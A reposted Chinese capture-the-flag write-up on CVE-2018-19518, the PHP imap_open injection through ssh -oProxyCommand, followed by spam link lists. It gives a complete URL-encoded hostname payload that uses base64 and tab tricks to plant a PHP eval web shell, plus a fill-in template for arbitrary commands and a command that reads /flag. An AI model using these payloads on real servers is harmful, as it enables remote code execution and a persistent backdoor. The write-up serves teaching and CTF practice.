当前位置: 首页 > news >正文 有哪个网站有免费视频素材wordpress f5 news 2025/10/31 1:08:15 有哪个网站有免费视频素材,wordpress f5,网站建设pc指什么,龙城区建设局网站CVE-2018-19518 漏洞介绍 IMAP协议#xff08;因特网消息访问协议#xff09;它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息#xff0c;下载邮件等。它运行在TCP/IP协议之上#xff0c;使用的端口是143。在php中调用的是imap_open函数。 PHP 的…CVE-2018-19518 漏洞介绍 IMAP协议因特网消息访问协议它的主要作用是邮件客户端可以通过这种协议从邮件服务器上获取邮件的信息下载邮件等。它运行在TCP/IP协议之上使用的端口是143。在php中调用的是imap_open函数。 PHP 的imap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。该漏洞的存在是因为受影响的软件的imap_open函数在将邮箱名称传递给rsh或ssh命令之前不正确地过滤邮箱名称。如果启用了rsh和ssh功能并且rsh命令是ssh命令的符号链接则攻击者可以通过向目标系统发送包含-oProxyCommand参数的恶意IMAP服务器名称来利用此漏洞。成功的攻击可能允许攻击者绕过其他禁用的exec 受影响软件中的功能攻击者可利用这些功能在目标系统上执行任意shell命令。利用此漏洞的功能代码是Metasploit Framework的一部分。 imap_open(string $mailbox,string $user,string $password) 其中参数mailbox,是用来连接邮箱服务器的。它会调用rsh来连接远程shell而debian/ubuntu中默认使用ssh来代替rsh如下图 又因为ssh命令中可以通过设置-oProxyCommand来调用第三方命令所以攻击者通过注入这个参数最终将导致命令执行漏洞。 ssh -oProxyCommand tac /flag|tee /tmp/executedlocalhost #其中管道符tee意思是将内容追加到文件并且在屏幕输出可以看到尽管没有连接成功但是我们成功的把命令写入到了文件所以这也就是我们系统被攻击的成因。 ProxyCommand连接服务器的这样的一个命令具体说明如下 ProxyCommand 指定用于连接服务器的命令。命令字符串扩展到行的末尾并使用用户的shell’ exec’指令执行以避免延迟的shell进程。 ProxyCommand接受TOKENS 部分中描述的令牌的参数。该命令基本上可以是任何东西并且应该从其标准输入读取并写入其标准输出。它应该最终连接在某台机器上运行的sshd服务器或者在sshd -i某处执行。主机密钥管理将使用所连接主机的HostName完成默认为用户键入的名称。设置命令以none完全禁用此选项。请注意 CheckHostIP无法与代理命令连接。 该指令与nc及其代理支持结合使用非常有用。例如以下指令将通过192.0.2.0的HTTP代理连接 ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p 解析命令时还会有问题。要绕过斜杠和空格的转义。用$IFS和\t或者base64编码和相关命令再解码。如下 echo echo hello|tee /tmp/executed|base64ehco ZWNobyBoZWxsb3x0ZWUgL3RtcC9leGVjdXRlZAo|base64 -d|bash影响版本 Ubuntu、Debian、Red Hat、SUSE PHP 5.6.x 5.6.39 开始做题。初始界面是邮箱登录有三个参数可以输入分别是邮箱、账号、密码。是CVE-2018-19518的特征。 看看network版本条件都满足。 抓个包看看三个参数是hostname、username、password猜测后端PHP语言用了imap_open(string $mailbox,string $user,string $password)语句。满足条件。 直接固定payload打 # 原始payload x-oProxyCommandecho echo ?php eval($_POST[1]); /var/www/html/1.php|base64 -d|sh}# base64url编码以后 hostnamex-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycgPiAvdmFyL3d3dy9odG1sLzEucGhw%3d|base64%09-d|sh}# 模板 hostnamex-oProxyCommand%3decho%09【要执行命令的base64】|base64%09-d|sh}usernamexxxpasswordxxx最终payload hostnamex-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbMV0pOycgPiAvdmFyL3d3dy9odG1sLzEucGhw%3d|base64%09-d|sh}usernamexxxpasswordxxx访问/1.php直接getshell。 文章转载自: http://www.morning.prls.cn.gov.cn.prls.cn http://www.morning.mhybs.cn.gov.cn.mhybs.cn http://www.morning.rzcmn.cn.gov.cn.rzcmn.cn http://www.morning.gbjxj.cn.gov.cn.gbjxj.cn http://www.morning.thzgd.cn.gov.cn.thzgd.cn http://www.morning.wnjsp.cn.gov.cn.wnjsp.cn http://www.morning.mnsts.cn.gov.cn.mnsts.cn http://www.morning.fwkpp.cn.gov.cn.fwkpp.cn http://www.morning.rjnx.cn.gov.cn.rjnx.cn http://www.morning.lmfmd.cn.gov.cn.lmfmd.cn http://www.morning.rjhts.cn.gov.cn.rjhts.cn http://www.morning.txjrc.cn.gov.cn.txjrc.cn http://www.morning.nnttr.cn.gov.cn.nnttr.cn http://www.morning.sbrrf.cn.gov.cn.sbrrf.cn http://www.morning.brrxz.cn.gov.cn.brrxz.cn http://www.morning.mxnhq.cn.gov.cn.mxnhq.cn http://www.morning.qsy39.cn.gov.cn.qsy39.cn http://www.morning.mnwb.cn.gov.cn.mnwb.cn http://www.morning.bpmz.cn.gov.cn.bpmz.cn http://www.morning.brwwr.cn.gov.cn.brwwr.cn http://www.morning.gnkbf.cn.gov.cn.gnkbf.cn http://www.morning.zwckz.cn.gov.cn.zwckz.cn http://www.morning.nzkkh.cn.gov.cn.nzkkh.cn http://www.morning.lrmts.cn.gov.cn.lrmts.cn http://www.morning.fplwz.cn.gov.cn.fplwz.cn http://www.morning.wgqtj.cn.gov.cn.wgqtj.cn http://www.morning.zfqr.cn.gov.cn.zfqr.cn http://www.morning.jtnph.cn.gov.cn.jtnph.cn http://www.morning.jfch.cn.gov.cn.jfch.cn http://www.morning.cszbj.cn.gov.cn.cszbj.cn http://www.morning.kcfnp.cn.gov.cn.kcfnp.cn http://www.morning.grxyx.cn.gov.cn.grxyx.cn http://www.morning.kzcfr.cn.gov.cn.kzcfr.cn http://www.morning.lksgz.cn.gov.cn.lksgz.cn http://www.morning.zphlb.cn.gov.cn.zphlb.cn http://www.morning.fkcjs.cn.gov.cn.fkcjs.cn http://www.morning.elbae.cn.gov.cn.elbae.cn http://www.morning.stwxr.cn.gov.cn.stwxr.cn http://www.morning.lfsmf.cn.gov.cn.lfsmf.cn http://www.morning.qcygd.cn.gov.cn.qcygd.cn http://www.morning.plnry.cn.gov.cn.plnry.cn http://www.morning.xnkb.cn.gov.cn.xnkb.cn http://www.morning.jyyw.cn.gov.cn.jyyw.cn http://www.morning.zmbzl.cn.gov.cn.zmbzl.cn http://www.morning.fqsxf.cn.gov.cn.fqsxf.cn http://www.morning.njstzsh.com.gov.cn.njstzsh.com http://www.morning.tkfnp.cn.gov.cn.tkfnp.cn http://www.morning.fzwf.cn.gov.cn.fzwf.cn http://www.morning.nsfxt.cn.gov.cn.nsfxt.cn http://www.morning.ybgt.cn.gov.cn.ybgt.cn http://www.morning.plqhb.cn.gov.cn.plqhb.cn http://www.morning.xtrnx.cn.gov.cn.xtrnx.cn http://www.morning.nkjnr.cn.gov.cn.nkjnr.cn http://www.morning.sqnrz.cn.gov.cn.sqnrz.cn http://www.morning.lthpr.cn.gov.cn.lthpr.cn http://www.morning.synkr.cn.gov.cn.synkr.cn http://www.morning.rnrwq.cn.gov.cn.rnrwq.cn http://www.morning.gkmwx.cn.gov.cn.gkmwx.cn http://www.morning.kwwkm.cn.gov.cn.kwwkm.cn http://www.morning.alwpc.cn.gov.cn.alwpc.cn http://www.morning.gynlc.cn.gov.cn.gynlc.cn http://www.morning.cwyrp.cn.gov.cn.cwyrp.cn http://www.morning.tnhmp.cn.gov.cn.tnhmp.cn http://www.morning.rkhhl.cn.gov.cn.rkhhl.cn http://www.morning.zrkws.cn.gov.cn.zrkws.cn http://www.morning.jwsrp.cn.gov.cn.jwsrp.cn http://www.morning.lnbcx.cn.gov.cn.lnbcx.cn http://www.morning.mcwgn.cn.gov.cn.mcwgn.cn http://www.morning.mtzyr.cn.gov.cn.mtzyr.cn http://www.morning.trnhy.cn.gov.cn.trnhy.cn http://www.morning.rsnn.cn.gov.cn.rsnn.cn http://www.morning.rnkq.cn.gov.cn.rnkq.cn http://www.morning.dydqh.cn.gov.cn.dydqh.cn http://www.morning.jtnph.cn.gov.cn.jtnph.cn http://www.morning.mwzt.cn.gov.cn.mwzt.cn http://www.morning.dswtz.cn.gov.cn.dswtz.cn http://www.morning.divocn.com.gov.cn.divocn.com http://www.morning.tqldj.cn.gov.cn.tqldj.cn http://www.morning.bnfrj.cn.gov.cn.bnfrj.cn http://www.morning.rlhjg.cn.gov.cn.rlhjg.cn 查看全文 http://www.tj-hxxt.cn/news/263830.html 相关文章: 网站建设的一些原理如何自己制作h5页面 哪些编程语言适合网站开发中国城市建设网 有什么设计网站推荐校园网组网方案设计 北京招聘网站建设做外贸网站包括哪些 自助发外链网站网站建设 方案 目前提供目录类搜索引擎的网站wordpress 纯静态 营销型网站开发营销软件技术专业介绍 昆明做网站竞价网站开发费用计入什么二级科目 网站培训建网站在线支付怎么 wordpress搭建短视频网站三原做网站 高端网站开发哪家专业网站设计哪家专业 网站建设 体会wordpress主题中文主题下载 济宁软件开发网站建设淘宝上开个网站建设 wordpress 多站点门户网站开发人员招聘信息 iis 网站正在建设中wordpress post_class 全flash网站模板活动营销方案 wordpress建设企业网站雅布设计作品 兼职做猎头的网站me域名网站 淘宝客网站主题下载游戏培训学校 金融网站html5模板摄影图片网站 沈阳专业制作网站公司吗网站建设 常用字体 百度里面企业网站怎么建设wordpress 无法发送邮件 资中网站建设四川做文学有关的网站 成都和奇乐网站建设公司怎么样建立个机密网站 淘宝客网站 备案wordpress新闻页面模板下载 牡丹江市建设局网站外贸网站建设内容包括哪些 国外设计网站pinterest极速版泾阳网站建设 用pycharm做网站wordpress实时预览 如何在网站投放广告新钥匙网站建设 福州 建站 软件怎么做网站板块
